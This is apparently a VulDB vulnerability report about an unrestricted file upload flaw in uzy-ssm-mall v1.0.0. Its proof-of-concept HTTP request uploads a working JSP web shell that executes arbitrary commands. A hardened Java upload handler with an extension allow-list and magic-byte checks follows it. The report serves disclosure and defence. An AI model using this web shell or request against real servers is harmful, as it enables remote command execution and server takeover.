| Title | ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload |
|---|
| Description |
|---|

Vulnerability Description

In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges.

Vulnerability Location

The vulnerability is located at the /mall/user/uploadUserHeadImage interface.

Code Audit Process

Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage

Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file in its response, which makes exploitation easier for an attacker.

Code Analysis:

The code calls getUserId in multiple places to obtain the user's userid and uses that userid for the related CRUD operations.

appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability.

POC:

```http
POST /mall/user/uploadUserHeadImage HTTP/1.1
Host: target-ip
Cookie: [user's Cookie]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 12345

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process process = Runtime.getRuntime().exec(cmd);
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
    out.println(line);
}
%>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
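The report names three missing controls: no validation of the uploaded file, storage under a client-chosen name, and the stored filename echoed back to the caller. The following is an added example of an upload handler that applies those controls; it is not code from uzy-ssm-mall (whose handler the report does not reproduce). It assumes the Spring `MultipartFile` type that an SSM application already has on its classpath; the package, class and method names (`SafeHeadImageUpload`, `store`, `allowedExtension`) are hypothetical.

```java
// Added example, not code from uzy-ssm-mall: a hardened head-image upload
// built on Spring's MultipartFile. Package and class names are hypothetical.
package example.upload;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.SecureRandom;
import java.util.Locale;
import java.util.Map;
import org.springframework.web.multipart.MultipartFile;

public final class SafeHeadImageUpload {

    private static final long MAX_BYTES = 2L * 1024 * 1024;

    // Allowed extension -> leading bytes the content must actually start with.
    private static final Map<String, byte[]> MAGIC = Map.of(
        "png", new byte[]{(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A},
        "jpg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "gif", new byte[]{'G', 'I', 'F', '8'});

    private static final SecureRandom RNG = new SecureRandom();
    private final Path storeDir;

    // storeDir should sit outside the servlet webroot so that nothing stored
    // here can ever be handed to the JSP engine, whatever its name.
    public SafeHeadImageUpload(Path storeDir) {
        this.storeDir = storeDir.toAbsolutePath().normalize();
    }

    // Stores the image and returns only a server-generated name; the
    // client-supplied filename never reaches the filesystem or the response.
    public String store(MultipartFile file, long userId) throws IOException {
        if (file == null || file.isEmpty()) {
            throw new IllegalArgumentException("empty upload");
        }
        if (file.getSize() > MAX_BYTES) {
            throw new IllegalArgumentException("upload too large");
        }
        String ext = allowedExtension(file.getOriginalFilename());
        byte[] data = file.getBytes();
        if (!startsWith(data, MAGIC.get(ext))) {
            throw new IllegalArgumentException("content does not match extension");
        }
        String name = userId + "_" + randomHex(16) + "." + ext;
        Path target = storeDir.resolve(name).normalize();
        if (!target.startsWith(storeDir)) { // defence in depth against traversal
            throw new IllegalStateException("path escapes store directory");
        }
        Files.write(target, data);
        return name;
    }

    // Only the final extension counts, lower-cased; anything not in the
    // allow-list (jsp, jspx, php, ...) is rejected outright.
    static String allowedExtension(String originalName) {
        if (originalName == null) {
            throw new IllegalArgumentException("missing filename");
        }
        int dot = originalName.lastIndexOf('.');
        if (dot < 0 || dot == originalName.length() - 1) {
            throw new IllegalArgumentException("missing extension");
        }
        String ext = originalName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (ext.equals("jpeg")) {
            ext = "jpg";
        }
        if (!MAGIC.containsKey(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        return ext;
    }

    static boolean startsWith(byte[] data, byte[] prefix) {
        if (data.length < prefix.length) {
            return false;
        }
        for (int i = 0; i < prefix.length; i++) {
            if (data[i] != prefix[i]) {
                return false;
            }
        }
        return true;
    }

    private static String randomHex(int bytes) {
        byte[] buf = new byte[bytes];
        RNG.nextBytes(buf);
        StringBuilder sb = new StringBuilder(bytes * 2);
        for (byte b : buf) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }
}
```

Against the request in the POC above, `allowedExtension("shell.jsp")` rejects the upload before any bytes are written; a file renamed to `shell.png` is then rejected by the magic-byte check because JSP source does not begin with the PNG signature. Either way the response carries at most a random server-chosen name, so the caller learns nothing about where an accepted file was placed.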
| Source | https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4 |
|---|
| User | XingYue_Mstir (UID 72225) |
|---|
| Submitted | 2025-04-02 11:54 AM (1 year ago) |
|---|
| Moderation | 2025-04-14 12:36 AM (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage File Privilege Escalation] |
|---|
| Points | 20 |
|---|